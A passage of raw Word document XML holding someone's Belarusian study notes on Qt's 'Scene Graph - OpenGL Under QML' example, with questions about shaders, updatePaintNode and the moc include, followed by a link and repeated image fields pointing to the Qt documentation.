          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">Прыклад працуе. Мне важна лепей зразумець, чаму не мы ўвесь код С++ змяшчаем у адзіны </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cpp</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">файл? Мы ствараем структуру </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>State</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">, якая апісвае пэўны стан. Потым мы ствараем Шэйдэр. Як Шэйдэр злучаны са </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>State</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">, я не вельмі адчуваю… Шэйдэр змяшчае код </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OpenGL</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ES</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">, які я пакуль слаба ўсведамляю. Метады класа Шэйдэра мне таксама слаба ясныя. Потым мы ствараем клас, што рэпрэзентуе вузел Сін-графа. Гэта мне ясна. Мы задаем там матэрыял і геаметрыю. У якасці матэрыяла мы выкарыстоўваем створаны вышэй шэйдэр. Потым мы ствараем </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> тып і ў функцыі </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:color w:val="800080"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>QSGNode</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:color w:val="C0C0C0"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>updatePaintNode</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:color w:val="800080"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>QSGNode</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:color w:val="C0C0C0"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>node</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:color w:val="C0C0C0"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:color w:val="800080"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>UpdatePaintNodeData</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:color w:val="C0C0C0"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>*)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> мы пішам код, які адмалёўвае гэты С++ тып у кмл. Так мы можам ствараць С++ тыпы, што візуальна адлюстроўваюцца ў кмл. Далей змешчана функцыя мэйн і сам кмл тып у асобным файле. </w:t>
      </w:r>
      <w:r w:rsidRPr="00555E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">Мне варта гэта будзе лепей зразумець у дэталях, а таксама варта будзе лепей зразумець, чаму ў канцы </w:t>
      </w:r>
      <w:r w:rsidRPr="00555E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cpp</w:t>
      </w:r>
      <w:r w:rsidRPr="00555E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> файла змяшчаецца ўключэнне мока, і менавіта ў канцы. Прыгадаць</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">, што ёсць мок файл. І я не вельмі ўлавіў, дзе тут змешчаны код градыента… у </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Open</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>GL</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4D6F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ES</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4D6F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>кодзе???</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRDefault="00165D8F" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00165D8F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">засвою лепей гэты прыклад, калі вывучу </w:t>
      </w:r>
      <w:r w:rsidRPr="00165D8F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OpenGL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C4D6F" w:rsidRPr="00D94480" w:rsidRDefault="00490E7E" w:rsidP="000C4D6F">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2166" w:history="1">
        <w:r w:rsidR="000C4D6F" w:rsidRPr="00D309FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http</w:t>
        </w:r>
        <w:r w:rsidR="000C4D6F" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidR="000C4D6F" w:rsidRPr="00D309FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>doc</w:t>
        </w:r>
        <w:r w:rsidR="000C4D6F" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="000C4D6F" w:rsidRPr="00D309FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="000C4D6F" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="000C4D6F" w:rsidRPr="00D309FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>io</w:t>
        </w:r>
        <w:r w:rsidR="000C4D6F" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="000C4D6F" w:rsidRPr="00D309FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="000C4D6F" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-5/</w:t>
        </w:r>
        <w:r w:rsidR="000C4D6F" w:rsidRPr="00D309FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qtquick</w:t>
        </w:r>
        <w:r w:rsidR="000C4D6F" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="000C4D6F" w:rsidRPr="00D309FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>scenegraph</w:t>
        </w:r>
        <w:r w:rsidR="000C4D6F" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="000C4D6F" w:rsidRPr="00D309FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>openglunderqml</w:t>
        </w:r>
        <w:r w:rsidR="000C4D6F" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="000C4D6F" w:rsidRPr="00D309FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>example</w:t>
        </w:r>
        <w:r w:rsidR="000C4D6F" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="000C4D6F" w:rsidRPr="00D309FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0035792D" w:rsidRPr="0035792D" w:rsidRDefault="0035792D" w:rsidP="00165D8F">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1818" w:name="_Toc483000924"/>
      <w:bookmarkStart w:id="1819" w:name="_Toc483003915"/>
      <w:bookmarkStart w:id="1820" w:name="_Toc483604267"/>
      <w:bookmarkStart w:id="1821" w:name="_Toc483605487"/>
      <w:r w:rsidRPr="00165D8F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Scene Graph - OpenGL Under QML</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1818"/>
      <w:bookmarkEnd w:id="1819"/>
      <w:bookmarkEnd w:id="1820"/>
      <w:bookmarkEnd w:id="1821"/>
    </w:p>
    <w:p w:rsidR="0035792D" w:rsidRPr="0035792D" w:rsidRDefault="0035792D" w:rsidP="0035792D">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/openglunderqml-example.jpg" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B34EC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B34EC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/openglunderqml-example.jpg" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00B34EC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00C50BB7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C50BB7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/openglunderqml-example.jpg" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00C50BB7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/openglunderqml-example.jpg" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00983E72">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00983E72">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/openglunderqml-example.jpg" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00983E72">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00123160">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00123160">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/openglunderqml-example.jpg" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00123160">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0072163C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0072163C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/openglunderqml-example.jpg" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0072163C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00EC78A6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00EC78A6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/openglunderqml-example.jpg" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00EC78A6">
        <w:rPr>
